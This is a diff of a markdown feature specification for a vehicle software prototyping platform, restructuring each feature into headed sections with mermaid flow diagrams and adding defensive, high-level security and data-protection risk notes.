+        CL["Change logs / audit<br/>(/v2/change-logs)"]
+        ST["Static / SPA / VSS<br/>(/static · /d · /vss)"]
+        CO["CORS / Helmet / middleware"]
+        SO["Socket.IO (realtime)"]
+        LC["Log / cache clients<br/>(LOG_URL · CACHE_URL)"]
+    end
+    SO -->|GitHub token delivery| GH
+    EM -->|reset/verify codes| HC
+    CL -.->|audit| FU
+    ST -->|serves| FU
+    CO -->|guards all| ST
+```
 
 ---
 
 ## SDV ProtoPilot (GenAI code generation)
 
-- **Description:** Generate an SDV Python app from a prompt; built-in "SDV Copilot" (`GENAI_SDV_APP_ENDPOINT`) + marketplace generators (`GENAI_MARKETPLACE_URL`); preview then apply to the prototype.
-- **Who uses it / value:** Prototype authors (bootstrap code); GenAI-capable users.
-- **Acceptance criteria:**
-  - Button shown when `SHOW_SDV_PROTOPILOT_BUTTON=true` and the user has `USE_GEN_AI`; generates code → preview → apply writes to `prototype.code`.
-  - Code diff shown when `SHOW_CODE_DIFF=true`.
-- **Quality control:** With the flag + permission, open ProtoPilot on Code tab → prompt → generated code preview → apply → code updated.
-- **Security:** Gated by `USE_GEN_AI` permission + `SHOW_SDV_PROTOPILOT_BUTTON`. Backend proxy requires auth.
-- **Data protection:** Prompt + generated code transit the GenAI service; generated code stored in the prototype.
+### Description
+
+Generate an SDV Python app from a prompt; built-in "SDV Copilot" (`GENAI_SDV_APP_ENDPOINT`) + marketplace generators (`GENAI_MARKETPLACE_URL`); preview then apply to the prototype.
+
+### Who uses it / value
+
+Prototype authors (bootstrap code); GenAI-capable users.
+
+### Acceptance criteria
+
+- Button shown when `SHOW_SDV_PROTOPILOT_BUTTON=true` and the user has `USE_GEN_AI`; generates code → preview → apply writes to `prototype.code`.
+- Code diff shown when `SHOW_CODE_DIFF=true`.
+
+### Quality control
+
+With the flag + permission, open ProtoPilot on Code tab → prompt → generated code preview → apply → code updated.
+
+```mermaid
+flowchart LR
+    U([Author]) -->|"prompt"| PP["SDV ProtoPilot<br/>(SHOW_SDV_PROTOPILOT_BUTTON + USE_GEN_AI)"]
+    PP -->|"call"| SDV["SDV Copilot<br/>(GENAI_SDV_APP_ENDPOINT)"]
+    PP -->|"call"| MK["Marketplace<br/>(GENAI_MARKETPLACE_URL)"]
+    SDV -->|generated code| PV["Preview (diff if SHOW_CODE_DIFF)"]
+    MK -->|generated code| PV
+    PV -->|"apply"| PC["prototype.code"]
+```
+
+### Security
+
+Gated by `USE_GEN_AI` permission + `SHOW_SDV_PROTOPILOT_BUTTON`. Backend proxy requires auth.
+
+**Risks:**
+- **Permission gate bypass:** if `USE_GEN_AI` were not enforced server-side, any user could consume GenAI compute (cost abuse) and inject generated code into prototypes they don't own.
+- **Untrusted generated code:** generated code is applied directly to `prototype.code`; a malicious or compromised generator could plant backdoors/exploits that later run in the prototype runtime.
+
+### Data protection
+
+Prompt + generated code transit the GenAI service; generated code stored in the prototype.
+
+**Risks:**
+- **Prompt leakage of private data:** prompts may include model/prototype context, sent to an external GenAI endpoint; sensitive vehicle data could leave the platform and be logged by the provider.
+- **Persistent generated artifacts:** generated code persisted in `prototype.code` may embed provider-influenced content with no redaction trail.
 
 ## GenAI service proxy
 
-- **Description:** Reverse-proxies `/v2/genai/*` to the GenAI microservice (`GENAI_URL`) with SSE streaming.
-- **Who uses it / value:** The frontend (GenAI calls); integrators (GenAI backend).
-- **Acceptance criteria:**
-  - `ALL /v2/genai/*` proxied to `GENAI_URL` (SSE streamed); auth required; inactive if `GENAI_URL` unset.
-- **Quality control:** With `GENAI_URL` set, ProtoPilot calls succeed; without it, the route is inactive.
-- **Security:** Auth required; SSE streaming passthrough.
-- **Data protection:** Proxies prompts/responses; no backend storage.
+### Description
+
+Reverse-proxies `/v2/genai/*` to the GenAI microservice (`GENAI_URL`) with SSE streaming.
+
+### Who uses it / value
+
+The frontend (GenAI calls); integrators (GenAI backend).
+
+### Acceptance criteria
+
+- `ALL /v2/genai/*` proxied to `GENAI_URL` (SSE streamed); auth required; inactive if `GENAI_URL` unset.
+
+### Quality control
+
+With `GENAI_URL` set, ProtoPilot calls succeed; without it, the route is inactive.
+
+```mermaid
+sequenceDiagram
+    participant FE as Frontend
+    participant BE as /v2/genai/* (auth)
+    participant GA as GENAI_URL (SSE)
+    FE->>BE: request (authenticated)
+    BE->>GA: proxy request
+    GA-->>BE: SSE stream chunks
+    BE-->>FE: SSE stream (passthrough)
+    Note over BE: inactive when GENAI_URL unset
+```
+
+### Security
+
+Auth required; SSE streaming passthrough.
+
+**Risks:**
+- **SSRF via proxy path:** if the path/host were not validated, an attacker could steer `/v2/genai/*` requests at internal endpoints through a controllable `GENAI_URL`.
+- **Auth bypass on proxy:** a missing auth check would expose the GenAI backend (and its compute cost) to anonymous callers.
+
+### Data protection
+
+Proxies prompts/responses; no backend storage.
+
+**Risks:**
+- **Prompt/response interception:** prompts and responses stream through the proxy unmodified; a misconfigured or compromised GenAI backend could log or leak user prompt content.
 
 ## GitHub OAuth (linking + SSO)
 
-- **Description:** Connect a GitHub account (socket-based callback emits the token) for project-editor git sync; GitHub SSO for login.
-- **Who uses it / value:** Authors (git sync intent); end users (GitHub login).
-- **Acceptance criteria:**
-  - `GET /v2/auth/github/callback` → exchanges code, emits token over the user's socket; `GET /v2/auth/github-sso/{start,callback}` → SSO login.
-  - Requires `GITHUB_CLIENT_ID/SECRET` (env or per-provider config).
-- **Quality control:** Connect GitHub → account linked; deeper git-sync UI is partial.
-- **Security:** OAuth code exchange server-side; token delivered via authenticated socket.
-- **Data protection:** GitHub tokens stored in `githubAuthStore` (persisted); treat as credentials.
+### Description
+
+Connect a GitHub account (socket-based callback emits the token) for project-editor git sync; GitHub SSO for login.
+
+### Who uses it / value
+
+Authors (git sync intent); end users (GitHub login).
+
+### Acceptance criteria
+
+- `GET /v2/auth/github/callback` → exchanges code, emits token over the user's socket; `GET /v2/auth/github-sso/{start,callback}` → SSO login.
+- Requires `GITHUB_CLIENT_ID/SECRET` (env or per-provider config).
+
+### Quality control
+
+Connect GitHub → account linked; deeper git-sync UI is partial.
+
+```mermaid
+sequenceDiagram
+    participant U as User
+    participant API as /v2/auth/github*
+    participant GH as GitHub
+    participant SK as Socket (auth/github)
+    U->>GH: authorize app
+    GH-->>U: callback code
+    U->>API: GET /v2/auth/github/callback?code=
+    API->>GH: exchange code (server-side)
+    GH-->>API: token
+    API->>SK: emit token over user socket
+    SK-->>U: token delivered
+```
+
+### Security
+
+OAuth code exchange server-side; token delivered via authenticated socket.
+
+**Risks:**
+- **Token delivery to wrong socket:** the token is emitted over the user's socket; a mismatched socket-to-session binding could deliver a GitHub token to the wrong user, granting account linking to an attacker.
+- **Client secret exposure:** a leaked `GITHUB_CLIENT_SECRET` would let an attacker impersonate the app and intercept OAuth codes via a rogue redirect.
+
+### Data protection
+
+GitHub tokens stored in `githubAuthStore` (persisted); treat as credentials.
+
+**Risks:**
+- **Credential-at-rest exposure:** GitHub tokens persisted in `githubAuthStore` are long-lived credentials; a store leak grants repository access under the user's identity.
+- **Token-in-query logging:** OAuth callback codes flow as query params and may be logged by proxies/CDNs before server-side exchange.
 
 ## Email service
 
-- **Description:** Transactional email (welcome, reset code, verification, test) via Resend or SMTP (site-configured, encrypted secrets), with legacy env fallback; welcome email non-blocking.
-- **Who uses it / value:** End users (account flows); admins (test config).
-- **Acceptance criteria:**
-  - `POST /v2/site-config/email/test` (admin) sends a test email; auth flows send welcome/reset/verify emails; failure of welcome doesn't block registration.
-- **Quality control:** Configure Resend/SMTP → test send succeeds; trigger forgot-password → reset code emailed.
-- **Security:** Secrets encrypted at rest; admin-only config.
-- **Data protection:** Recipient email + content sent to the provider; reset codes are one-time.
+### Description
+
+Transactional email (welcome, reset code, verification, test) via Resend or SMTP (site-configured, encrypted secrets), with legacy env fallback; welcome email non-blocking.
+
+### Who uses it / value
+
+End users (account flows); admins (test config).
+
+### Acceptance criteria
+
+- `POST /v2/site-config/email/test` (admin) sends a test email; auth flows send welcome/reset/verify emails; failure of welcome doesn't block registration.
+
+### Quality control
+
+Configure Resend/SMTP → test send succeeds; trigger forgot-password → reset code emailed.
+
+```mermaid
+flowchart LR
+    A([Admin]) -->|"POST /v2/site-config/email/test"| S["Site config (encrypted secrets)"]
+    S -->|Resend| R["Resend API"]
+    S -->|SMTP| M["SMTP server"]
+    AF["Auth flows"] -->|"welcome / reset / verify"| S
+    S -.->|"welcome failure non-blocking"| REG["Registration proceeds"]
+```
+
+### Security
+
+Secrets encrypted at rest; admin-only config.
+
+**Risks:**
+- **Secret decryption failure:** encrypted Resend/SMTP secrets decrypted at send time; a key rotation mishap could brick all transactional email (reset/verify) silently.
+- **Admin config abuse:** a compromised admin could repoint SMTP/Resend to an attacker-controlled server and capture every reset code/verification email.
+
+### Data protection
+
+Recipient email + content sent to the provider; reset codes are one-time.
+
+**Risks:**
+- **Reset code interception:** reset codes sent in cleartext email; a misconfigured provider or compromised mailbox lets an attacker complete password resets.
+- **Provider-side retention:** recipient emails and content are processed by the external provider and may be retained per that provider's policy.
 
 ## Web Studio widget creation
 
-- **Description:** Create/embed a widget via the external bewebstudio service.
-- **Who uses it / value:** Widget authors.
-- **Acceptance criteria:**
-  - `webStudio.service` creates/opens a widget; the create-from-scratch button is commented out in the current UI but the service exists.
-- **Quality control:** Service callable; UI entry currently disabled.
-- **Security:** External service; same caveats as remote widgets.
-- **Data protection:** Widget URL only.
+### Description
+
+Create/embed a widget via the external bewebstudio service.
+
+### Who uses it / value
+
+Widget authors.
+
+### Acceptance criteria
+
+- `webStudio.service` creates/opens a widget; the create-from-scratch button is commented out in the current UI but the service exists.
+
+### Quality control
+
+Service callable; UI entry currently disabled.
+
+### Security
+
+External service; same caveats as remote widgets.
+
+**Risks:**
+- **Unvetted remote widget:** widgets created via the external bewebstudio service execute remotely and load into the platform; a compromised service could inject hostile scripts into authorized sessions.
+
+### Data protection
+
+Widget URL only.
+
+**Risks:**
+- **URL-parameter leakage:** widget URLs may carry identifiers that reveal which widgets a user authored/accessed, observable to the external service.
 
 ## Search
 
-- **Description:** Regex search across accessible models & prototypes by name/description; user-by-email; prototypes-by-signal; plus a Global search UI in the nav bar.
-- **Who uses it / value:** End users (discover); sharing flows (find users).
-- **Acceptance criteria:**
-  - `GET /v2/search?q=&sortBy=&limit=&page=` (optional auth via `PUBLIC_VIEWING`) → `200` models + prototypes accessible to the caller.
-  - `GET /v2/search/email/:email` → `200` user or `404`; `GET /v2/search/prototypes/by-signal/:signal` → matching prototypes.
-  - Global search UI (`DaGlobalSearch`) with type filters.
-- **Quality control:** Search a term → accessible results only; search an inaccessible model → not returned; by-signal → prototypes whose code contains the signal.
-- **Security:** Optional auth via `PUBLIC_VIEWING`; scoped to accessible resources (no leakage).
-- **Data protection:** `q` regex over name/description; by-signal scans prototype `code` in memory.
+### Description
+
+Regex search across accessible models & prototypes by name/description; user-by-email; prototypes-by-signal; plus a Global search UI in the nav bar.
+
+### Who uses it / value
+
+End users (discover); sharing flows (find users).
+
+### Acceptance criteria
+
+- `GET /v2/search?q=&sortBy=&limit=&page=` (optional auth via `PUBLIC_VIEWING`) → `200` models + prototypes accessible to the caller.
+- `GET /v2/search/email/:email` → `200` user or `404`; `GET /v2/search/prototypes/by-signal/:signal` → matching prototypes.
+- Global search UI (`DaGlobalSearch`) with type filters.
+
+### Quality control
+
+Search a term → accessible results only; search an inaccessible model → not returned; by-signal → prototypes whose code contains the signal.
+
+```mermaid
+flowchart TD
+    U([User]) -->|"GET /v2/search?q="| SE{PUBLIC_VIEWING?}
+    SE -->|anon + true| PUB["Public results only"]
+    SE -->|authed| ACC["Accessible models + prototypes"]
+    U -->|"GET /v2/search/email/:email"| UE["200 user | 404"]
+    U -->|"GET /v2/search/prototypes/by-signal/:signal"| BS["Matching prototypes (code scan)"]
+```
+
+### Security
+
+Optional auth via `PUBLIC_VIEWING`; scoped to accessible resources (no leakage).
+
+**Risks:**
+- **Access-scope bypass:** if scoping weren't enforced server-side, a `q` regex could enumerate private models/prototypes by name/description across tenants.
+- **User enumeration by email:** `/v2/search/email/:email` returns `200`/`404`, enabling account-existence enumeration for phishing targeting known users.
+
+### Data protection
+
+`q` regex over name/description; by-signal scans prototype `code` in memory.
+
+**Risks:**
+- **Code-content disclosure via by-signal:** `/v2/search/prototypes/by-signal/:signal` scans prototype `code`; a crafted signal pattern could excerpt proprietary code fragments to a caller who lacks direct access to the prototype.
 
 ## Discussions
 
-- **Description:** Threaded comments on any resource (`ref`+`ref_type`) with optional `parent` for replies; top-level-only list.
-- **Who uses it / value:** Collaborators/reviewers (comment on resources).
-- **Acceptance criteria:**
-  - `GET /v2/discussions?ref=<id>` (optional auth) → `200` top-level threads; `POST` (auth) → `201`; `PATCH/DELETE /:id` → `200`/`204`. `ref` query required for list.
-- **Quality control:** Create a discussion on a resource → appears in list; reply via `parent`; list returns top-level only.
-- **Security:** List optional; write auth. **Partial** — no dedicated routed page; wired contextually.
-- **Data protection:** `ref`/`ref_type`/`content`/`created_by` stored.
+### Description
+
+Threaded comments on any resource (`ref`+`ref_type`) with optional `parent` for replies; top-level-only list.
+
+### Who uses it / value
+
+Collaborators/reviewers (comment on resources).
+
+### Acceptance criteria
+
+- `GET /v2/discussions?ref=<id>` (optional auth) → `200` top-level threads; `POST` (auth) → `201`; `PATCH/DELETE /:id` → `200`/`204`. `ref` query required for list.
+
+### Quality control
+
+Create a discussion on a resource → appears in list; reply via `parent`; list returns top-level only.
+
+### Security
+
+List optional; write auth. **Partial** — no dedicated routed page; wired contextually.
+
+**Risks:**
+- **Cross-resource spam:** `ref`+`ref_type` accept any value; without an access check on the referenced resource, a user could attach hostile comments to private resources they can't read, polluting them.
+- **Unauthorized edit/delete:** if ownership weren't enforced on `PATCH/DELETE`, any authenticated user could alter or remove others' comments.
+
+### Data protection
+
+`ref`/`ref_type`/`content`/`created_by` stored.
+
+**Risks:**
+- **Comment content retention:** `content` is free text and persists until deleted; users may inadvertently embed secrets or PII in comments that are hard to purge.
 
 ## Feedback service
 
-- **Description:** Structured feedback with scores (1–5) + interview metadata (see [prototypes-code.md](./prototypes-code.md) for the UI).
-- **Who uses it / value:** Reviewers; prototype owners.
-- **Acceptance criteria:**
-  - `GET/POST /v2/feedbacks` (list optional, write auth); `PATCH/DELETE /:id` → `200`/`204` (own).
-- **Quality control:** Add feedback → persisted; delete own → `204`; delete others' → `403`.
-- **Security:** Add auth; delete own only.
-- **Data protection:** Scores + interviewee metadata stored.
+### Description
+
+Structured feedback with scores (1–5) + interview metadata (see [prototypes-code.md](./prototypes-code.md) for the UI).
+
+### Who uses it / value
+
+Reviewers; prototype owners.
+
+### Acceptance criteria
+
+- `GET/POST /v2/feedbacks` (list optional, write auth); `PATCH/DELETE /:id` → `200`/`204` (own).
+
+### Quality control
+
+Add feedback → persisted; delete own → `204`; delete others' → `403`.
+
+### Security
+
+Add auth; delete own only.
+
+**Risks:**
+- **Ownership bypass on delete:** if the own-only check failed, a user could delete others' feedback, destroying review records.
+- **Feedback spam:** write auth alone (no rate limit) could let a user flood a prototype with feedback entries.
+
+### Data protection
+
+Scores + interviewee metadata stored.
+
+**Risks:**
+- **Interviewee PII retention:** interview metadata may contain personal identifiers of interviewees; stored without a defined retention/pruning policy.
 
 ## Health check
 
-- **Description:** Consolidated status of MongoDB, JWT sign/verify, auth login, upload dir, runtime server, SSO reachability.
-- **Who uses it / value:** DevOps/monitoring.
-- **Acceptance criteria:**
-  - `GET /v2/health` (public) → `200` for `ok`/`degraded`, `503` for `error`, with per-service messages; page `/health` shows badges.
-- **Quality control:** Hit `/v2/health` → status + per-service messages; stop Mongo → degraded.
-- **Security:** Public.
-- **Data protection:** Status info only (no secrets).
+### Description
+
+Consolidated status of MongoDB, JWT sign/verify, auth login, upload dir, runtime server, SSO reachability.
+
+### Who uses it / value
+
+DevOps/monitoring.
+
+### Acceptance criteria
+
+- `GET /v2/health` (public) → `200` for `ok`/`degraded`, `503` for `error`, with per-service messages; page `/health` shows badges.
+
+### Quality control
+
+Hit `/v2/health` → status + per-service messages; stop Mongo → degraded.
+
+```mermaid
+flowchart TD
+    H["GET /v2/health (public)"] --> C{Aggregate checks}
+    C -->|ok/degraded| R200["200 + per-service messages"]
+    C -->|error| R503["503 + per-service messages"]
+    C --> M[(MongoDB)]
+    C --> J[JWT sign/verify]
+    C --> A[Auth login]
+    C --> U[Upload dir]
+    C --> S[Runtime server]
+    C --> SSO[SSO reachability]
+```
+
+### Security
+
+Public.
+
+**Risks:**
+- **Information disclosure:** `503`/`200` responses include per-service messages; a public endpoint leaking which service is down (e.g. Mongo unreachable) aids attackers in timing attacks and targeting the weak link.
+- **Unauthenticated probing:** SSO reachability checks from a public endpoint can be abused to enumerate/confirm external identity-provider endpoints.
+
+### Data protection
+
+Status info only (no secrets).
+
+**Risks:**
+- **Service fingerprinting:** per-service status messages may disclose internal hostnames, error text, or dependency versions, giving an attacker a footprint map of internal infrastructure.
 
 ## File upload
 
-- **Description:** Multer single-file upload to `static/uploads/YYYY-MM-DD/`; auto-scales images (sharp, max 1024 px); served at `/d/...` (1-year cache). 50 MB file / 10 MB field limits.
-- **Who uses it / value:** End users (avatars, model/prototype images); the app (asset hosting).
-- **Acceptance criteria:**
-  - `POST /v2/file/upload/store-be` (auth) → `200 { url }`; images auto-scaled; served at `/d/...` with long cache.
-- **Quality control:** Upload an image → returned URL serves a scaled image; upload >50 MB → rejected.
-- **Security:** Auth required; any file type allowed (50 MB cap) — validate on use.
-- **Data protection:** Files served publicly under `/d/`; retention = files persist until deleted (no auto-prune).
+### Description
+
+Multer single-file upload to `static/uploads/YYYY-MM-DD/`; auto-scales images (sharp, max 1024 px); served at `/d/...` (1-year cache). 50 MB file / 10 MB field limits.
+
+### Who uses it / value
+
+End users (avatars, model/prototype images); the app (asset hosting).
+
+### Acceptance criteria
+
+- `POST /v2/file/upload/store-be` (auth) → `200 { url }`; images auto-scaled; served at `/d/...` with long cache.
+
+### Quality control
+
+Upload an image → returned URL serves a scaled image; upload >50 MB → rejected.
+
+```mermaid
+sequenceDiagram
+    participant U as User (auth)
+    participant API as /v2/file/upload/store-be
+    participant M as Multer (50MB cap)
+    participant SH as sharp (max 1024px)
+    participant FS as static/uploads/YYYY-MM-DD/
+    participant D as /d/... (1-year cache)
+    U->>API: single file
+    API->>M: parse (reject >50MB)
+    M->>SH: image? auto-scale
+    SH->>FS: write
+    FS-->>D: served publicly
+    API-->>U: 200 { url }
+```
+
+### Security
+
+Auth required; any file type allowed (50 MB cap) — validate on use.
+
+**Risks:**
+- **Malicious file storage:** any file type is accepted (50 MB cap); an attacker can upload HTML/SVG/executable payloads served from `/d/...`, enabling stored XSS via SVG/HTML or malware hosting.
+- **Storage exhaustion:** with auth but no per-user quota, a user could fill disk with 50 MB uploads, degrading the platform.
+
+### Data protection
+
+Files served publicly under `/d/`; retention = files persist until deleted (no auto-prune).
+
+**Risks:**
+- **Permanent public exposure:** uploads under `/d/` are public and unauthenticated; a private image uploaded for a draft is world-readable by URL, and persists indefinitely with no auto-prune.
+- **Metadata in uploads:** image EXIF or document metadata is not stripped before public serving, potentially leaking author/device/location data.
 
 ## Change logs / audit
 
-- **Description:** `captureChange` Mongoose plugin on Model & Prototype records CREATE/UPDATE/DELETE with field diffs (throttled/batched for frequent updates like `code`); admin paginated list.
-- **Who uses it / value:** Admins/auditors (trace changes).
-- **Acceptance criteria:**
-  - `GET /v2/change-logs` (auth + `MANAGE_USERS`) → `200` paginated audit entries (`action`, `changes`, `ref`).
-  - Frequent `code` updates batched into throttled entries (~60 s).
-- **Quality control:** Update a model → a `changelogs` entry appears; admin can list/filter; non-admin → `403`.
-- **Security:** `MANAGE_USERS` (read optional via `PUBLIC_VIEWING` but `checkPermission(ADMIN)` enforced).
-- **Data protection:** `changelogs` is a **capped** collection (bounded size); stores field diffs (may include code/content).
+### Description
+
+`captureChange` Mongoose plugin on Model & Prototype records CREATE/UPDATE/DELETE with field diffs (throttled/batched for frequent updates like `code`); admin paginated list.
+
+### Who uses it / value
+
+Admins/auditors (trace changes).
+
+### Acceptance criteria
+
+- `GET /v2/change-logs` (auth + `MANAGE_USERS`) → `200` paginated audit entries (`action`, `changes`, `ref`).
+- Frequent `code` updates batched into throttled entries (~60 s).
+
+### Quality control
+
+Update a model → a `changelogs` entry appears; admin can list/filter; non-admin → `403`.
+
+```mermaid
+flowchart LR
+    M[("Model / Prototype")] -->|CREATE/UPDATE/DELETE| CC["captureChange plugin"]
+    CC -->|field diffs| CL[("changelogs (capped)")]
+    CC -.->|"code updates batched ~60s"| CL
+    A([Admin + MANAGE_USERS]) -->|"GET /v2/change-logs"| CL
+    CL -->|"200 paginated"| A
+    NA([Non-admin]) -.->|"403"| CL
+```
+
+### Security
+
+`MANAGE_USERS` (read optional via `PUBLIC_VIEWING` but `checkPermission(ADMIN)` enforced).
+
+**Risks:**
+- **Admin-only bypass via PUBLIC_VIEWING ambiguity:** the "optional auth via `PUBLIC_VIEWING`" wording could be misimplemented to expose audit diffs publicly if the `checkPermission(ADMIN)` gate were ever dropped, leaking full change history.
+- **Audit tampering:** the plugin writes to a capped collection; a compromised admin with write access could rotate/clear entries to cover tracks.
+
+### Data protection
+
+`changelogs` is a **capped** collection (bounded size); stores field diffs (may include code/content).
+
+**Risks:**
+- **Sensitive code in diffs:** field diffs may include `code` content; storing proprietary prototype code in a (capped, overwritten) collection means old audit entries silently age out, losing the audit trail for long-lived disputes.
+- **Capped-collection data loss:** because the collection is capped, high-frequency change volume evicts the oldest audit entries — evidence of early incidents can be permanently lost without warning.
 
 ## Static serving, SPA, VSS static
 
-- **Description:** Serves `/static`, `/images`, `/plugin`, `/builtin-widgets`, `/d`; production serves the built SPA with index.html fallback; dev proxies to Vite `:3210`; VSS JSONs at `/vss/:version/:filename` (1-hour cache).
-- **Who uses it / value:** All users (the app + assets); integrators (VSS data).
-- **Acceptance criteria:**
-  - Static assets served with correct MIME; SPA fallback serves `index.html` for unknown routes (production); `/vss/:version/:filename` returns JSON.
-- **Quality control:** Hit the app root → SPA loads; an asset URL → served; `/vss/4.0/vss.json` → JSON.
-- **Security:** Public; Helmet CSP applies (wildcard in both envs — known permissive).
-- **Data protection:** Static assets only.
+### Description
+
+Serves `/static`, `/images`, `/plugin`, `/builtin-widgets`, `/d`; production serves the built SPA with index.html fallback; dev proxies to Vite `:3210`; VSS JSONs at `/vss/:version/:filename` (1-hour cache).
+
+### Who uses it / value
+
+All users (the app + assets); integrators (VSS data).
+
+### Acceptance criteria
+
+- Static assets served with correct MIME; SPA fallback serves `index.html` for unknown routes (production); `/vss/:version/:filename` returns JSON.
+
+### Quality control
+
+Hit the app root → SPA loads; an asset URL → served; `/vss/4.0/vss.json` → JSON.
+
+```mermaid
+flowchart TD
+    R[Request] --> S{Path?}
+    S -->|/static /images /plugin /builtin-widgets /d| A["Static asset (correct MIME)"]
+    S -->|/vss/:version/:filename| V["VSS JSON (1-hour cache)"]
+    S -->|unknown route (prod)| SPA["index.html fallback"]
+    S -->|unknown route (dev)| VP["Vite proxy :3210"]
+```
+
+### Security
+
+Public; Helmet CSP applies (wildcard in both envs — known permissive).
+
+**Risks:**
+- **Permissive CSP:** wildcard-open CSP in both dev and prod allows broad script sources; combined with `/plugin` and `/builtin-widgets` static serving, it widens the XSS/plugin-injection attack surface.
+- **Path traversal in static serving:** a misconfigured static root or lax path handling could let `/static`/`/d` resolve to files outside the asset directory.
+
+### Data protection
+
+Static assets only.
+
+**Risks:**
+- **Public asset enumeration:** `/static`, `/d`, and `/vss/:version/:filename` are publicly listable/guessable; an attacker can enumerate uploaded assets and VSS files by date/version without authentication.
 
 ## CORS / Helmet CSP / security middleware
 
-- **Description:** Regex CORS allowlist (`CORS_ORIGINS`), cookie-parser, mongo-sanitize, gzip, Helmet CSP (wildcard-open in both dev and prod — only `objectSrc` is `'none'`), `trust proxy`.
-- **Who uses it / value:** DevOps (deploy securely); the app (browser loading).
-- **Acceptance criteria:**
-  - CORS allows configured origins (http/https auto-prefixed); CSP headers set; sanitize inputs; `trust proxy` enabled.
-- **Quality control:** Check response headers → CORS + CSP present; cross-origin script loads with `crossOrigin=anonymous`.
-- **Security:** ⚠️ CSP is wildcard-open (not restrictive) — a known gap. `authLimiter` defined but unused. CORS is the real origin gate.
-- **Data protection:** mongo-sanitize strips `$`/`.` keys from inputs; cookies httpOnly.
+### Description
+
+Regex CORS allowlist (`CORS_ORIGINS`), cookie-parser, mongo-sanitize, gzip, Helmet CSP (wildcard-open in both dev and prod — only `objectSrc` is `'none'`), `trust proxy`.
+
+### Who uses it / value
+
+DevOps (deploy securely); the app (browser loading).
+
+### Acceptance criteria
+
+- CORS allows configured origins (http/https auto-prefixed); CSP headers set; sanitize inputs; `trust proxy` enabled.
+
+### Quality control
+
+Check response headers → CORS + CSP present; cross-origin script loads with `crossOrigin=anonymous`.
+
+```mermaid
+flowchart LR
+    R[Incoming request] --> CP[cookie-parser]
+    CP --> MS[mongo-sanitize strips $/.]
+    MS --> GZ[gzip]
+    GZ --> H[Helmet CSP wildcard-open]
+    H --> TP[trust proxy]
+    TP --> A[App]
+    A -->|response| CO[CORS allowlist (CORS_ORIGINS)]
+```
+
+### Security
+
+⚠️ CSP is wildcard-open (not restrictive) — a known gap. `authLimiter` defined but unused. CORS is the real origin gate.
+
+**Risks:**
+- **Permissive CSP allows injection:** wildcard-open CSP (only `objectSrc` restricted) lets injected or compromised scripts execute freely, weakening the only header-based XSS mitigation.
+- **Unused rate limiter:** `authLimiter` defined but not applied; auth endpoints have no rate limiting, enabling credential-stuffing brute force.
+- **CORS origin regex bypass:** a regex CORS allowlist can be subverted (e.g. attacker origin matching a substring), allowing cross-origin credentialed requests from rogue sites.
+
+### Data protection
+
+mongo-sanitize strips `$`/`.` keys from inputs; cookies httpOnly.
+
+**Risks:**
+- **NoSQL injection despite sanitize:** mongo-sanitize targets keys; operator injection via values or array payloads may still bypass it, risking data exfiltration or modification.
+- **Cookie leakage on non-TLS:** httpOnly cookies without `secure` enforcement over non-TLS connections can be sniffed; `trust proxy` must be correctly configured or the trust can be spoofed.
 
 ## Socket.IO (realtime)
 
-- **Description:** JWT-authenticated Socket.IO (token via `access_token` query); pushes auth events (GitHub OAuth token/errors).
-- **Who uses it / value:** Auth flows (GitHub token delivery); future realtime features.
-- **Acceptance criteria:**
-  - Handshake verifies JWT, attaches `socket.user`; `auth/github`/`auth/github/error` events emitted.
-- **Quality control:** Connect with a valid access token → connected; invalid → rejected.
-- **Security:** JWT verified on handshake.
-- **Data protection:** Token in query string (use TLS in prod); event payloads may include GitHub tokens.
+### Description
+
+JWT-authenticated Socket.IO (token via `access_token` query); pushes auth events (GitHub OAuth token/errors).
+
+### Who uses it / value
+
+Auth flows (GitHub token delivery); future realtime features.
+
+### Acceptance criteria
+
+- Handshake verifies JWT, attaches `socket.user`; `auth/github`/`auth/github/error` events emitted.
+
+### Quality control
+
+Connect with a valid access token → connected; invalid → rejected.
+
+```mermaid
+sequenceDiagram
+    participant C as Client
+    participant S as Socket.IO
+    participant GH as Auth flow
+    C->>S: connect ?access_token=<JWT>
+    S->>S: verify JWT
+    S-->>C: connected (socket.user attached)
+    GH-->>S: emit auth/github (token) | auth/github/error
+    S-->>C: push event
+```
+
+### Security
+
+JWT verified on handshake.
+
+**Risks:**
+- **Token-in-query logging:** the JWT travels as a `access_token` query param; query strings are commonly logged by proxies, CDNs, and access logs, exposing valid tokens.
+- **Event spoofing to wrong socket:** GitHub OAuth tokens are pushed over `auth/github`; a session-binding flaw could emit a token to a socket that isn't the originating user.
+
+### Data protection
+
+Token in query string (use TLS in prod); event payloads may include GitHub tokens.
+
+**Risks:**
+- **Credential leakage via logs:** tokens in the query string persist in proxy/load-balancer logs; without TLS termination controls and log redaction, credentials are recoverable from logs.
+- **Payload retention on client:** event payloads carrying GitHub tokens are held in client memory/logic; a misrouted event could surface another user's token to the wrong client.
 
 ## Log / cache service clients
 
-- **Description:** Forward audit/forgot-password events to `LOG_URL`; pull recent-prototype activity from `CACHE_URL`.
-- **Who uses it / value:** DevOps (centralized logs/activity).
-- **Acceptance criteria:**
-  - Internal clients; active when `LOG_URL`/`CACHE_URL` configured; failures non-blocking for the main flows.
-- **Quality control:** Configure the URLs → events forwarded / recent activity served.
-- **Security:** Internal clients; configure with appropriate auth on the target services.
-- **Data protection:** Forwards event metadata (incl. email for forgot-password); respect target service retention.
+### Description
+
+Forward audit/forgot-password events to `LOG_URL`; pull recent-prototype activity from `CACHE_URL`.
+
+### Who uses it / value
+
+DevOps (centralized logs/activity).
+
+### Acceptance criteria
+
+- Internal clients; active when `LOG_URL`/`CACHE_URL` configured; failures non-blocking for the main flows.
+
+### Quality control
+
+Configure the URLs → events forwarded / recent activity served.
+
+```mermaid
+flowchart LR
+    APP[App events] -->|audit / forgot-password| LOG["LOG_URL (internal client)"]
+    APP -->|recent activity pull| CACHE["CACHE_URL (internal client)"]
+    LOG -.->|"failure non-blocking"| APP
+    CACHE -.->|"failure non-blocking"| APP
+```
+
+### Security
+
+Internal clients; configure with appropriate auth on the target services.
+
+**Risks:**
+- **Unauthenticated outbound forwarding:** `LOG_URL`/`CACHE_URL` are internal clients; if the target services aren't auth-protected, anyone who can reach them can read forwarded audit events or poison the activity cache.
+- **SSRF via misconfigured URL:** an attacker able to influence `LOG_URL`/`CACHE_URL` could redirect audit events (including password-reset metadata) to an attacker endpoint.
+
+### Data protection
+
+Forwards event metadata (incl. email for forgot-password); respect target service retention.
+
+**Risks:**
+- **Email leakage to logs:** forgot-password events include the user's email and are forwarded to `LOG_URL`; a permissive logging target retains user emails indefinitely.
